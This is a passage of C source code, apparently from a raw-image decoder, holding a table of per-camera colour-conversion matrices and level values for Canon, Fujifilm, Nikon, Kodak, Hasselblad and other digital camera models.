{ 6264,-582,-724,-8312,15948,2504,-1744,1919,8664 } },
{ "Canon EOS-1DS", 0, 0xe20,
{ 4374,3631,-1743,-7520,15212,2472,-2892,3632,8161 } },
{ "Canon EOS-1D C", 0, 0x3c4e,
{ 6847,-614,-1014,-4669,12737,2139,-1197,2488,6846 } },
{ "Canon EOS-1D X Mark II", 0, 0x3c4e,
{ 7596,-978,967,-4808,12571,2503,-1398,2567,5752 } },
{ "Canon EOS-1D X", 0, 0x3c4e,
{ 6847,-614,-1014,-4669,12737,2139,-1197,2488,6846 } },
{ "Canon EOS-1D", 0, 0xe20,
{ 6806,-179,-1020,-8097,16415,1687,-3267,4236,7690 } },
{ "Canon EOS C500", 853, 0, /* DJC */
{ 17851,-10604,922,-7425,16662,763,-3660,3636,22278 } },
{ "Canon PowerShot A530", 0, 0,
{ 0 } }, /* don't want the A5 matrix */
{ "Canon PowerShot A50", 0, 0,
{ -5300,9846,1776,3436,684,3939,-5540,9879,6200,-1404,11175,217 } },
{ "Canon PowerShot A5", 0, 0,
{ -4801,9475,1952,2926,1611,4094,-5259,10164,5947,-1554,10883,547 } },
{ "Canon PowerShot G10", 0, 0,
{ 11093,-3906,-1028,-5047,12492,2879,-1003,1750,5561 } },
{ "Canon PowerShot G11", 0, 0,
{ 12177,-4817,-1069,-1612,9864,2049,-98,850,4471 } },
{ "Canon PowerShot G12", 0, 0,
{ 13244,-5501,-1248,-1508,9858,1935,-270,1083,4366 } },
{ "Canon PowerShot G15", 0, 0,
{ 7474,-2301,-567,-4056,11456,2975,-222,716,4181 } },
{ "Canon PowerShot G16", 0, 0,
{ 14130,-8071,127,2199,6528,1551,3402,-1721,4960 } },
{ "Canon PowerShot G1 X Mark II", 0, 0,
{ 7378,-1255,-1043,-4088,12251,2048,-876,1946,5805 } },
{ "Canon PowerShot G1 X", 0, 0,
{ 7378,-1255,-1043,-4088,12251,2048,-876,1946,5805 } },
{ "Canon PowerShot G1", 0, 0,
{ -4778,9467,2172,4743,-1141,4344,-5146,9908,6077,-1566,11051,557 } },
{ "Canon PowerShot G2", 0, 0,
{ 9087,-2693,-1049,-6715,14382,2537,-2291,2819,7790 } },
{ "Canon PowerShot G3 X", 0, 0,
{ 9701,-3857,-921,-3149,11537,1817,-786,1817,5147 } },
{ "Canon PowerShot G3", 0, 0,
{ 9212,-2781,-1073,-6573,14189,2605,-2300,2844,7664 } },
{ "Canon PowerShot G5 X",0, 0,
{ 9602,-3823,-937,-2984,11495,1675,-407,1415,5049 } },
{ "Canon PowerShot G5", 0, 0,
{ 9757,-2872,-933,-5972,13861,2301,-1622,2328,7212 } },
{ "Canon PowerShot G6", 0, 0,
{ 9877,-3775,-871,-7613,14807,3072,-1448,1305,7485 } },
{ "Canon PowerShot G7 X Mark II", 0, 0,
{ 9602,-3823,-937,-2984,11495,1675,-407,1415,5049 } },
{ "Canon PowerShot G7 X", 0, 0,
{ 9602,-3823,-937,-2984,11495,1675,-407,1415,5049 } },
{ "Canon PowerShot G9 X",0, 0,
{ 9602,-3823,-937,-2984,11495,1675,-407,1415,5049 } },
{ "Canon PowerShot G9", 0, 0,
{ 7368,-2141,-598,-5621,13254,2625,-1418,1696,5743 } },
{ "Canon PowerShot Pro1", 0, 0,
{ 10062,-3522,-999,-7643,15117,2730,-765,817,7323 } },
{ "Canon PowerShot Pro70", 34, 0,
{ -4155,9818,1529,3939,-25,4522,-5521,9870,6610,-2238,10873,1342 } },
{ "Canon PowerShot Pro90", 0, 0,
{ -4963,9896,2235,4642,-987,4294,-5162,10011,5859,-1770,11230,577 } },
{ "Canon PowerShot S30", 0, 0,
{ 10566,-3652,-1129,-6552,14662,2006,-2197,2581,7670 } },
{ "Canon PowerShot S40", 0, 0,
{ 8510,-2487,-940,-6869,14231,2900,-2318,2829,9013 } },
{ "Canon PowerShot S45", 0, 0,
{ 8163,-2333,-955,-6682,14174,2751,-2077,2597,8041 } },
{ "Canon PowerShot S50", 0, 0,
{ 8882,-2571,-863,-6348,14234,2288,-1516,2172,6569 } },
{ "Canon PowerShot S60", 0, 0,
{ 8795,-2482,-797,-7804,15403,2573,-1422,1996,7082 } },
{ "Canon PowerShot S70", 0, 0,
{ 9976,-3810,-832,-7115,14463,2906,-901,989,7889 } },
{ "Canon PowerShot S90", 0, 0,
{ 12374,-5016,-1049,-1677,9902,2078,-83,852,4683 } },
{ "Canon PowerShot S95", 0, 0,
{ 13440,-5896,-1279,-1236,9598,1931,-180,1001,4651 } },
{ "Canon PowerShot S120", 0, 0,
{ 6961,-1685,-695,-4625,12945,1836,-1114,2152,5518 } },
{ "Canon PowerShot S110", 0, 0,
{ 8039,-2643,-654,-3783,11230,2930,-206,690,4194 } },
{ "Canon PowerShot S100", 0, 0,
{ 7968,-2565,-636,-2873,10697,2513,180,667,4211 } },
{ "Canon PowerShot SX1 IS", 0, 0,
{ 6578,-259,-502,-5974,13030,3309,-308,1058,4970 } },
{ "Canon PowerShot SX50 HS", 0, 0,
{ 12432,-4753,-1247,-2110,10691,1629,-412,1623,4926 } },
{ "Canon PowerShot SX60 HS", 0, 0,
{ 13161,-5451,-1344,-1989,10654,1531,-47,1271,4955 } },
{ "Canon PowerShot A3300", 0, 0, /* DJC */
{ 10826,-3654,-1023,-3215,11310,1906,0,999,4960 } },
{ "Canon PowerShot A470", 0, 0, /* DJC */
{ 12513,-4407,-1242,-2680,10276,2405,-878,2215,4734 } },
{ "Canon PowerShot A610", 0, 0, /* DJC */
{ 15591,-6402,-1592,-5365,13198,2168,-1300,1824,5075 } },
{ "Canon PowerShot A620", 0, 0, /* DJC */
{ 15265,-6193,-1558,-4125,12116,2010,-888,1639,5220 } },
{ "Canon PowerShot A630", 0, 0, /* DJC */
{ 14201,-5308,-1757,-6087,14472,1617,-2191,3105,5348 } },
{ "Canon PowerShot A640", 0, 0, /* DJC */
{ 13124,-5329,-1390,-3602,11658,1944,-1612,2863,4885 } },
{ "Canon PowerShot A650", 0, 0, /* DJC */
{ 9427,-3036,-959,-2581,10671,1911,-1039,1982,4430 } },
{ "Canon PowerShot A720", 0, 0, /* DJC */
{ 14573,-5482,-1546,-1266,9799,1468,-1040,1912,3810 } },
{ "Canon PowerShot S3 IS", 0, 0, /* DJC */
{ 14062,-5199,-1446,-4712,12470,2243,-1286,2028,4836 } },
{ "Canon PowerShot SX110 IS", 0, 0, /* DJC */
{ 14134,-5576,-1527,-1991,10719,1273,-1158,1929,3581 } },
{ "Canon PowerShot SX220", 0, 0, /* DJC */
{ 13898,-5076,-1447,-1405,10109,1297,-244,1860,3687 } },
{ "Canon IXUS 160", 0, 0, /* DJC */
{ 11657,-3781,-1136,-3544,11262,2283,-160,1219,4700 } },
{ "Casio EX-S20", 0, 0, /* DJC */
{ 11634,-3924,-1128,-4968,12954,2015,-1588,2648,7206 } },
{ "Casio EX-Z750", 0, 0, /* DJC */
{ 10819,-3873,-1099,-4903,13730,1175,-1755,3751,4632 } },
{ "Casio EX-Z10", 128, 0xfff, /* DJC */
{ 9790,-3338,-603,-2321,10222,2099,-344,1273,4799 } },
{ "CINE 650", 0, 0,
{ 3390,480,-500,-800,3610,340,-550,2336,1192 } },
{ "CINE 660", 0, 0,
{ 3390,480,-500,-800,3610,340,-550,2336,1192 } },
{ "CINE", 0, 0,
{ 20183,-4295,-423,-3940,15330,3985,-280,4870,9800 } },
{ "Contax N Digital", 0, 0xf1e,
{ 7777,1285,-1053,-9280,16543,2916,-3677,5679,7060 } },
{ "DXO ONE", 0, 0,
{ 6596,-2079,-562,-4782,13016,1933,-970,1581,5181 } },
{ "Epson R-D1", 0, 0,
{ 6827,-1878,-732,-8429,16012,2564,-704,592,7145 } },
{ "Fujifilm E550", 0, 0,
{ 11044,-3888,-1120,-7248,15168,2208,-1531,2277,8069 } },
{ "Fujifilm E900", 0, 0,
{ 9183,-2526,-1078,-7461,15071,2574,-2022,2440,8639 } },
{ "Fujifilm F5", 0, 0,
{ 13690,-5358,-1474,-3369,11600,1998,-132,1554,4395 } },
{ "Fujifilm F6", 0, 0,
{ 13690,-5358,-1474,-3369,11600,1998,-132,1554,4395 } },
{ "Fujifilm F77", 0, 0xfe9,
{ 13690,-5358,-1474,-3369,11600,1998,-132,1554,4395 } },
{ "Fujifilm F7", 0, 0,
{ 10004,-3219,-1201,-7036,15047,2107,-1863,2565,7736 } },
{ "Fujifilm F8", 0, 0,
{ 13690,-5358,-1474,-3369,11600,1998,-132,1554,4395 } },
{ "Fujifilm S100FS", 514, 0,
{ 11521,-4355,-1065,-6524,13767,3058,-1466,1984,6045 } },
{ "Fujifilm S1", 0, 0,
{ 12297,-4882,-1202,-2106,10691,1623,-88,1312,4790 } },
{ "Fujifilm S20Pro", 0, 0,
{ 10004,-3219,-1201,-7036,15047,2107,-1863,2565,7736 } },
{ "Fujifilm S20", 512, 0x3fff,
{ 11401,-4498,-1312,-5088,12751,2613,-838,1568,5941 } },
{ "Fujifilm S2Pro", 128, 0,
{ 12492,-4690,-1402,-7033,15423,1647,-1507,2111,7697 } },
{ "Fujifilm S3Pro", 0, 0,
{ 11807,-4612,-1294,-8927,16968,1988,-2120,2741,8006 } },
{ "Fujifilm S5Pro", 0, 0,
{ 12300,-5110,-1304,-9117,17143,1998,-1947,2448,8100 } },
{ "Fujifilm S5000", 0, 0,
{ 8754,-2732,-1019,-7204,15069,2276,-1702,2334,6982 } },
{ "Fujifilm S5100", 0, 0,
{ 11940,-4431,-1255,-6766,14428,2542,-993,1165,7421 } },
{ "Fujifilm S5500", 0, 0,
{ 11940,-4431,-1255,-6766,14428,2542,-993,1165,7421 } },
{ "Fujifilm S5200", 0, 0,
{ 9636,-2804,-988,-7442,15040,2589,-1803,2311,8621 } },
{ "Fujifilm S5600", 0, 0,
{ 9636,-2804,-988,-7442,15040,2589,-1803,2311,8621 } },
{ "Fujifilm S6", 0, 0,
{ 12628,-4887,-1401,-6861,14996,1962,-2198,2782,7091 } },
{ "Fujifilm S7000", 0, 0,
{ 10190,-3506,-1312,-7153,15051,2238,-2003,2399,7505 } },
{ "Fujifilm S9000", 0, 0,
{ 10491,-3423,-1145,-7385,15027,2538,-1809,2275,8692 } },
{ "Fujifilm S9500", 0, 0,
{ 10491,-3423,-1145,-7385,15027,2538,-1809,2275,8692 } },
{ "Fujifilm S9100", 0, 0,
{ 12343,-4515,-1285,-7165,14899,2435,-1895,2496,8800 } },
{ "Fujifilm S9600", 0, 0,
{ 12343,-4515,-1285,-7165,14899,2435,-1895,2496,8800 } },
{ "Fujifilm SL1000", 0, 0,
{ 11705,-4262,-1107,-2282,10791,1709,-555,1713,4945 } },
{ "Fujifilm IS-1", 0, 0,
{ 21461,-10807,-1441,-2332,10599,1999,289,875,7703 } },
{ "Fujifilm IS Pro", 0, 0,
{ 12300,-5110,-1304,-9117,17143,1998,-1947,2448,8100 } },
{ "Fujifilm HS10 HS11", 0, 0xf68,
{ 12440,-3954,-1183,-1123,9674,1708,-83,1614,4086 } },
{ "Fujifilm HS2", 0, 0,
{ 13690,-5358,-1474,-3369,11600,1998,-132,1554,4395 } },
{ "Fujifilm HS3", 0, 0,
{ 13690,-5358,-1474,-3369,11600,1998,-132,1554,4395 } },
{ "Fujifilm HS50EXR", 0, 0,
{ 12085,-4727,-953,-3257,11489,2002,-511,2046,4592 } },
{ "Fujifilm F900EXR", 0, 0,
{ 12085,-4727,-953,-3257,11489,2002,-511,2046,4592 } },
{ "Fujifilm X100S", 0, 0,
{ 10592,-4262,-1008,-3514,11355,2465,-870,2025,6386 } },
{ "Fujifilm X100T", 0, 0,
{ 10592,-4262,-1008,-3514,11355,2465,-870,2025,6386 } },
{ "Fujifilm X100", 0, 0,
{ 12161,-4457,-1069,-5034,12874,2400,-795,1724,6904 } },
{ "Fujifilm X10", 0, 0,
{ 13509,-6199,-1254,-4430,12733,1865,-331,1441,5022 } },
{ "Fujifilm X20", 0, 0,
{ 11768,-4971,-1133,-4904,12927,2183,-480,1723,4605 } },
{ "Fujifilm X30", 0, 0,
{ 12328,-5256,-1144,-4469,12927,1675,-87,1291,4351 } },
{ "Fujifilm X70", 0, 0,
{ 10450,-4329,-878,-3217,11105,2421,-752,1758,6519 } },
{ "Fujifilm X-Pro1", 0, 0,
{ 10413,-3996,-993,-3721,11640,2361,-733,1540,6011 } },
{ "Fujifilm X-Pro2", 0, 0,
{ 11434,-4948,-1210,-3746,12042,1903,-666,1479,5235 } },
{ "Fujifilm X-A1", 0, 0,
{ 11086,-4555,-839,-3512,11310,2517,-815,1341,5940 } },
{ "Fujifilm X-A2", 0, 0,
{ 10763,-4560,-917,-3346,11311,2322,-475,1135,5843 } },
{ "Fujifilm X-E1", 0, 0,
{ 10413,-3996,-993,-3721,11640,2361,-733,1540,6011 } },
{ "Fujifilm X-E2S", 0, 0,
{ 11562,-5118,-961,-3022,11007,2311,-525,1569,6097 } },
{ "Fujifilm X-E2", 0, 0,
{ 12066,-5927,-367,-1969,9878,1503,-721,2034,5453 } },
{ "Fujifilm XF1", 0, 0,
{ 13509,-6199,-1254,-4430,12733,1865,-331,1441,5022 } },
{ "Fujifilm X-M1", 0, 0,
{ 13193,-6685,-425,-2229,10458,1534,-878,1763,5217 } },
{ "Fujifilm X-S1", 0, 0,
{ 13509,-6199,-1254,-4430,12733,1865,-331,1441,5022 } },
{ "Fujifilm X-T10", 0, 0,
{ 10763,-4560,-917,-3346,11311,2322,-475,1135,5843 } },
{ "Fujifilm X-T1", 0, 0,
{ 8458,-2451,-855,-4597,12447,2407,-1475,2482,6526 } },
{ "Fujifilm X-T2", 0, 0,
{ 11434,-4948,-1210,-3746,12042,1903,-666,1479,5235 } },
{ "Fujifilm XQ1", 0, 0,
{ 9252,-2704,-1064,-5893,14265,1717,-1101,2341,4349 } },
{ "Fujifilm XQ2", 0, 0,
{ 9252,-2704,-1064,-5893,14265,1717,-1101,2341,4349 } },
{ "GITUP GIT2", 3200, 0,
{8489, -2583,-1036,-8051,15583,2643,-1307,1407,7354}},
{ "Hasselblad Lunar", 0, 0,
{ 5491,-1192,-363,-4951,12342,2948,-911,1722,7192 } },
{ "Hasselblad Stellar", -800, 0,
{ 8651,-2754,-1057,-3464,12207,1373,-568,1398,4434 } },
{ "Hasselblad CFV", 0, 0, /* Adobe */
{ 8519, -3260, -280, -5081, 13459, 1738, -1449, 2960, 7809, } },
{ "Hasselblad H-16MP", 0, 0, /* LibRaw */
{ 17765,-5322,-1734,-6168,13354,2135,-264,2524,7440 } },
{ "Hasselblad H-22MP", 0, 0, /* LibRaw */
{ 17765,-5322,-1734,-6168,13354,2135,-264,2524,7440 } },
{ "Hasselblad H-31MP",0, 0, /* LibRaw */
{ 14480,-5448,-1686,-3534,13123,2260,384,2952,7232 } },
{ "Hasselblad H-39MP",0, 0, /* Adobe */
{ 3857,452, -46, -6008, 14477, 1596, -2627, 4481, 5718 } },
{ "Hasselblad H3D-50", 0, 0, /* Adobe */
{ 3857,452, -46, -6008, 14477, 1596, -2627, 4481, 5718 } },
{ "Hasselblad H4D-40",0, 0, /* LibRaw */
{ 6325,-860,-957,-6559,15945,266,167,770,5936 } },
{ "Hasselblad H4D-50",0, 0, /* LibRaw */
{ 15283,-6272,-465,-2030,16031,478,-2379,390,7965 } },
{ "Hasselblad H4D-60",0, 0, /* Adobe */
{ 9662, -684, -279, -4903, 12293, 2950, -344, 1669, 6024 } },
{ "Hasselblad H5D-50c",0, 0, /* Adobe */
{ 4932, -835, 141, -4878, 11868, 3437, -1138, 1961, 7067 } },
{ "Hasselblad H5D-50",0, 0, /* Adobe */
{ 5656, -659, -346, -3923, 12306, 1791, -1602, 3509, 5442 } },
{ "Hasselblad X1D",0, 0, /* Adobe */
{4932, -835, 141, -4878, 11868, 3437, -1138, 1961, 7067 }},
{ "HTC One A9", 64, 1023, /* this is CM1 transposed */
{ 101, -20, -2, -11, 145, 41, -24, 1, 56 } },
{ "Imacon Ixpress", 0, 0, /* DJC */
{ 7025,-1415,-704,-5188,13765,1424,-1248,2742,6038 } },
{ "Kodak NC2000", 0, 0,
{ 13891,-6055,-803,-465,9919,642,2121,82,1291 } },
{ "Kodak DCS315C", -8, 0,
{ 17523,-4827,-2510,756,8546,-137,6113,1649,2250 } },
{ "Kodak DCS330C", -8, 0,
{ 20620,-7572,-2801,-103,10073,-396,3551,-233,2220 } },
{ "Kodak DCS420", 0, 0,
{ 10868,-1852,-644,-1537,11083,484,2343,628,2216 } },
{ "Kodak DCS460", 0, 0,
{ 10592,-2206,-967,-1944,11685,230,2206,670,1273 } },
{ "Kodak EOSDCS1", 0, 0,
{ 10592,-2206,-967,-1944,11685,230,2206,670,1273 } },
{ "Kodak EOSDCS3B", 0, 0,
{ 9898,-2700,-940,-2478,12219,206,1985,634,1031 } },
{ "Kodak DCS520C", -178, 0,
{ 24542,-10860,-3401,-1490,11370,-297,2858,-605,3225 } },
{ "Kodak DCS560C", -177, 0,
{ 20482,-7172,-3125,-1033,10410,-285,2542,226,3136 } },
{ "Kodak DCS620C", -177, 0,
{ 23617,-10175,-3149,-2054,11749,-272,2586,-489,3453 } },
{ "Kodak DCS620X", -176, 0,
{ 13095,-6231,154,12221,-21,-2137,895,4602,2258 } },
{ "Kodak DCS660C", -173, 0,
{ 18244,-6351,-2739,-791,11193,-521,3711,-129,2802 } },
{ "Kodak DCS720X", 0, 0,
{ 11775,-5884,950,9556,1846,-1286,-1019,6221,2728 } },
{ "Kodak DCS760C", 0, 0,
{ 16623,-6309,-1411,-4344,13923,323,2285,274,2926 } },
{ "Kodak DCS Pro SLR", 0, 0,
{ 5494,2393,-232,-6427,13850,2846,-1876,3997,5445 } },
{ "Kodak DCS Pro 14nx", 0, 0,
{ 5494,2393,-232,-6427,13850,2846,-1876,3997,5445 } },
{ "Kodak DCS Pro 14", 0, 0,
{ 7791,3128,-776,-8588,16458,2039,-2455,4006,6198 } },
{ "Kodak ProBack645", 0, 0,
{ 16414,-6060,-1470,-3555,13037,473,2545,122,4948 } },
{ "Kodak ProBack", 0, 0,
{ 21179,-8316,-2918,-915,11019,-165,3477,-180,4210 } },
{ "Kodak P712", 0, 0,
{ 9658,-3314,-823,-5163,12695,2768,-1342,1843,6044 } },
{ "Kodak P850", 0, 0xf7c,
{ 10511,-3836,-1102,-6946,14587,2558,-1481,1792,6246 } },
{ "Kodak P880", 0, 0xfff,
{ 12805,-4662,-1376,-7480,15267,2360,-1626,2194,7904 } },
{ "Kodak EasyShare Z980", 0, 0,
{ 11313,-3559,-1101,-3893,11891,2257,-1214,2398,4908 } },
{ "Kodak EasyShare Z981", 0, 0,
{ 12729,-4717,-1188,-1367,9187,2582,274,860,4411 } },
{ "Kodak EasyShare Z990", 0, 0xfed,
{ 11749,-4048,-1309,-1867,10572,1489,-138,1449,4522 } },
{ "Kodak EASYSHARE Z1015", 0, 0xef1,
{ 11265,-4286,-992,-4694,12343,2647,-1090,1523,5447 } },
{ "Leaf CMost", 0, 0,
{ 3952,2189,449,-6701,14585,2275,-4536,7349,6536 } },
{ "Leaf Valeo 6", 0, 0,
{ 3952,2189,449,-6701,14585,2275,-4536,7349,6536 } },
{ "Leaf Aptus 54S", 0, 0,
{ 8236,1746,-1314,-8251,15953,2428,-3673,5786,5771 } },
{ "Leaf Aptus 65", 0, 0,
{ 7914,1414,-1190,-8777,16582,2280,-2811,4605,5562 } },
{ "Leaf Aptus 75", 0, 0,
{ 7914,1414,-1190,-8777,16582,2280,-2811,4605,5562 } },
{ "Leaf Credo 40", 0, 0,
{ 8035, 435, -962, -6001, 13872, 2320, -1159, 3065, 5434 } },
{ "Leaf Credo 50", 0, 0,
{ 3984, 0, 0, 0, 10000, 0, 0, 0, 7666 } },
{ "Leaf Credo 60", 0, 0,
{ 8035, 435, -962, -6001, 13872,2320,-1159,3065,5434 } },
{ "Leaf Credo 80", 0, 0,
{ 6294, 686, -712, -5435, 13417, 2211, -1006, 2435, 5042 } },
{ "Leaf", 0, 0,
{ 8236,1746,-1314,-8251,15953,2428,-3673,5786,5771 } },
{ "Mamiya ZD", 0, 0,
{ 7645,2579,-1363,-8689,16717,2015,-3712,5941,5961 } },
{ "Micron 2010", 110, 0, /* DJC */
{ 16695,-3761,-2151,155,9682,163,3433,951,4904 } },
{ "Minolta DiMAGE 5", 0, 0xf7d,
{ 8983,-2942,-963,-6556,14476,2237,-2426,2887,8014 } },
{ "Minolta DiMAGE 7Hi", 0, 0xf7d,
{ 11368,-3894,-1242,-6521,14358,2339,-2475,3056,7285 } },
{ "Minolta DiMAGE 7", 0, 0xf7d,
{ 9144,-2777,-998,-6676,14556,2281,-2470,3019,7744 } },
{ "Minolta DiMAGE A1", 0, 0xf8b,
{ 9274,-2547,-1167,-8220,16323,1943,-2273,2720,8340 } },
{ "Minolta DiMAGE A200", 0, 0,
{ 8560,-2487,-986,-8112,15535,2771,-1209,1324,7743 } },
{ "Minolta DiMAGE A2", 0, 0xf8f,
{ 9097,-2726,-1053,-8073,15506,2762,-966,981,7763 } },
{ "Minolta DiMAGE Z2", 0, 0, /* DJC */
{ 11280,-3564,-1370,-4655,12374,2282,-1423,2168,5396 } },
{ "Minolta DYNAX 5", 0, 0xffb,
{ 10284,-3283,-1086,-7957,15762,2316,-829,882,6644 } },
{ "Minolta DYNAX 7", 0, 0xffb,
{ 10239,-3104,-1099,-8037,15727,2451,-927,925,6871 } },
{ "Motorola PIXL", 0, 0, /* DJC */
{ 8898,-989,-1033,-3292,11619,1674,-661,3178,5216 } },
{ "Nikon D100", 0, 0,
{ 5902,-933,-782,-8983,16719,2354,-1402,1455,6464 } },
{ "Nikon D1H", 0, 0,
{ 7577,-2166,-926,-7454,15592,1934,-2377,2808,8606 } },
{ "Nikon D1X", 0, 0,
{ 7702,-2245,-975,-9114,17242,1875,-2679,3055,8521 } },
{ "Nikon D1", 0, 0, /* multiplied by 2.218750, 1.0, 1.148438 */
{ 16772,-4726,-2141,-7611,15713,1972,-2846,3494,9521 } },
{ "Nikon D200", 0, 0xfbc,
{ 8367,-2248,-763,-8758,16447,2422,-1527,1550,8053 } },
{ "Nikon D2H", 0, 0,
{ 5710,-901,-615,-8594,16617,2024,-2975,4120,6830 } },
{ "Nikon D2X", 0, 0,
{ 10231,-2769,-1255,-8301,15900,2552,-797,680,7148 } },
{ "Nikon D3000", 0, 0,
{ 8736,-2458,-935,-9075,16894,2251,-1354,1242,8263 } },
{ "Nikon D3100", 0, 0,
{ 7911,-2167,-813,-5327,13150,2408,-1288,2483,7968 } },
{ "Nikon D3200", 0, 0xfb9,
{ 7013,-1408,-635,-5268,12902,2640,-1470,2801,7379 } },
{ "Nikon D3300", 0, 0,
{ 6988,-1384,-714,-5631,13410,2447,-1485,2204,7318 } },
{ "Nikon D3400", 0, 0,
{ 6988,-1384,-714,-5631,13410,2447,-1485,2204,7318 } },
{ "Nikon D300", 0, 0,
{ 9030,-1992,-715,-8465,16302,2255,-2689,3217,8069 } },
{ "Nikon D3X", 0, 0,
{ 7171,-1986,-648,-8085,15555,2718,-2170,2512,7457 } },
{ "Nikon D3S", 0, 0,
{ 8828,-2406,-694,-4874,12603,2541,-660,1509,7587 } },
{ "Nikon D3", 0, 0,
{ 8139,-2171,-663,-8747,16541,2295,-1925,2008,8093 } },
{ "Nikon D40X", 0, 0,
{ 8819,-2543,-911,-9025,16928,2151,-1329,1213,8449 } },
{ "Nikon D40", 0, 0,
{ 6992,-1668,-806,-8138,15748,2543,-874,850,7897 } },
{ "Nikon D4S", 0, 0,
{ 8598,-2848,-857,-5618,13606,2195,-1002,1773,7137 } },
{ "Nikon D4", 0, 0,
{ 8598,-2848,-857,-5618,13606,2195,-1002,1773,7137 } },
{ "Nikon Df", 0, 0,
{ 8598,-2848,-857,-5618,13606,2195,-1002,1773,7137 } },
{ "Nikon D5000", 0, 0xf00,
{ 7309,-1403,-519,-8474,16008,2622,-2433,2826,8064 } },
{ "Nikon D5100", 0, 0x3de6,
{ 8198,-2239,-724,-4871,12389,2798,-1043,2050,7181 } },
{ "Nikon D5200", 0, 0,
{ 8322,-3112,-1047,-6367,14342,2179,-988,1638,6394 } },
{ "Nikon D5300", 0, 0,
{ 6988,-1384,-714,-5631,13410,2447,-1485,2204,7318 } },
{ "Nikon D5500", 0, 0,
{ 8821,-2938,-785,-4178,12142,2287,-824,1651,6860 } },
{ "Nikon D500", 0, 0,
{ 8813,-3210,-1036,-4703,12868,2021,-1054,1940,6129 } },
{ "Nikon D50", 0, 0,
{ 7732,-2422,-789,-8238,15884,2498,-859,783,7330 } },
{ "Nikon D5", 0, 0,
{ 9200,-3522,-992,-5755,13803,2117,-753,1486,6338 } },
{ "Nikon D600", 0, 0x3e07,
{ 8178,-2245,-609,-4857,12394,2776,-1207,2086,7298 } },
{ "Nikon D610",0, 0,
{ 10426,-4005,-444,-3565,11764,1403,-1206,2266,6549 } },
{ "Nikon D60", 0, 0,
{ 8736,-2458,-935,-9075,16894,2251,-1354,1242,8263 } },
{ "Nikon D7000", 0, 0,
{ 8198,-2239,-724,-4871,12389,2798,-1043,2050,7181 } },
{ "Nikon D7100", 0, 0,
{ 8322,-3112,-1047,-6367,14342,2179,-988,1638,6394 } },
{ "Nikon D7200", 0, 0,
{ 8322,-3112,-1047,-6367,14342,2179,-988,1638,6394 } },
{ "Nikon D750", -600, 0,
{ 9020,-2890,-715,-4535,12436,2348,-934,1919,7086 } },
{ "Nikon D700", 0, 0,
{ 8139,-2171,-663,-8747,16541,2295,-1925,2008,8093 } },
{ "Nikon D70", 0, 0,
{ 7732,-2422,-789,-8238,15884,2498,-859,783,7330 } },
{ "Nikon D810A", 0, 0,
{ 11973, -5685, -888, -1965, 10326, 1901, -115, 1123, 7169 } },
{ "Nikon D810", 0, 0,
{ 9369,-3195,-791,-4488,12430,2301,-893,1796,6872 } },
{ "Nikon D800", 0, 0,
{ 7866,-2108,-555,-4869,12483,2681,-1176,2069,7501 } },
{ "Nikon D80", 0, 0,
{ 8629,-2410,-883,-9055,16940,2171,-1490,1363,8520 } },
{ "Nikon D90", 0, 0xf00,
{ 7309,-1403,-519,-8474,16008,2622,-2434,2826,8064 } },
{ "Nikon E700", 0, 0x3dd, /* DJC */
{ -3746,10611,1665,9621,-1734,2114,-2389,7082,3064,3406,6116,-244 } },
{ "Nikon E800", 0, 0x3dd, /* DJC */
{ -3746,10611,1665,9621,-1734,2114,-2389,7082,3064,3406,6116,-244 } },
{ "Nikon E950", 0, 0x3dd, /* DJC */
{ -3746,10611,1665,9621,-1734,2114,-2389,7082,3064,3406,6116,-244 } },
{ "Nikon E995", 0, 0, /* copied from E5000 */
{ -5547,11762,2189,5814,-558,3342,-4924,9840,5949,688,9083,96 } },
{ "Nikon E2100", 0, 0, /* copied from Z2, new white balance */
{ 13142,-4152,-1596,-4655,12374,2282,-1769,2696,6711 } },
{ "Nikon E2500", 0, 0,
{ -5547,11762,2189,5814,-558,3342,-4924,9840,5949,688,9083,96 } },
{ "Nikon E3200", 0, 0, /* DJC */
{ 9846,-2085,-1019,-3278,11109,2170,-774,2134,5745 } },
{ "Nikon E4300", 0, 0, /* copied from Minolta DiMAGE Z2 */
{ 11280,-3564,-1370,-4655,12374,2282,-1423,2168,5396 } },
{ "Nikon E4500", 0, 0,
{ -5547,11762,2189,5814,-558,3342,-4924,9840,5949,688,9083,96 } },
{ "Nikon E5000", 0, 0,
{ -5547,11762,2189,5814,-558,3342,-4924,9840,5949,688,9083,96 } },
{ "Nikon E5400", 0, 0,
{ 9349,-2987,-1001,-7919,15766,2266,-2098,2680,6839 } },
{ "Nikon E5700", 0, 0,
{ -5368,11478,2368,5537,-113,3148,-4969,10021,5782,778,9028,211 } },
{ "Nikon E8400", 0, 0,
{ 7842,-2320,-992,-8154,15718,2599,-1098,1342,7560 } },
{ "Nikon E8700", 0, 0,
{ 8489,-2583,-1036,-8051,15583,2643,-1307,1407,7354 } },
{ "Nikon E8800", 0, 0,
{ 7971,-2314,-913,-8451,15762,2894,-1442,1520,7610 } },
{ "Nikon COOLPIX A", 0, 0,
{ 8198,-2239,-724,-4871,12389,2798,-1043,2050,7181 } },
{ "Nikon COOLPIX B700", 0, 0,
{ 14387,-6014,-1299,-1357,9975,1616,467,1047,4744 } },
{ "Nikon COOLPIX P330", -200, 0,
{ 10321,-3920,-931,-2750,11146,1824,-442,1545,5539 } },
{ "Nikon COOLPIX P340", -200, 0,
{ 10321,-3920,-931,-2750,11146,1824,-442,1545,5539 } },
{ "Nikon COOLPIX P6000", 0, 0,
{ 9698,-3367,-914,-4706,12584,2368,-837,968,5801 } },
{ "Nikon COOLPIX P7000", 0, 0,
{ 11432,-3679,-1111,-3169,11239,2202,-791,1380,4455 } },
{ "Nikon COOLPIX P7100", 0, 0,
{ 11053,-4269,-1024,-1976,10182,2088,-526,1263,4469 } },
{ "Nikon COOLPIX P7700", -3200, 0,
{ 10321,-3920,-931,-2750,11146,1824,-442,1545,5539 } },
{ "Nikon COOLPIX P7800", -3200, 0,
{ 10321,-3920,-931,-2750,11146,1824,-442,1545,5539 } },
{ "Nikon 1 V3", -200, 0,
{ 5958,-1559,-571,-4021,11453,2939,-634,1548,5087 } },
{ "Nikon 1 J4", 0, 0,
{ 5958,-1559,-571,-4021,11453,2939,-634,1548,5087 } },
{ "Nikon 1 J5", 0, 0,
{ 7520,-2518,-645,-3844,12102,1945,-913,2249,6835} },
{ "Nikon 1 S2", -200, 0,
{ 6612,-1342,-618,-3338,11055,2623,-174,1792,5075 } },
{ "Nikon 1 V2", 0, 0,
{ 6588,-1305,-693,-3277,10987,2634,-355,2016,5106 } },
{ "Nikon 1 J3", 0, 0,
{ 8144,-2671,-473,-1740,9834,1601,-58,1971,4296 } },
{ "Nikon 1 AW1", 0, 0,
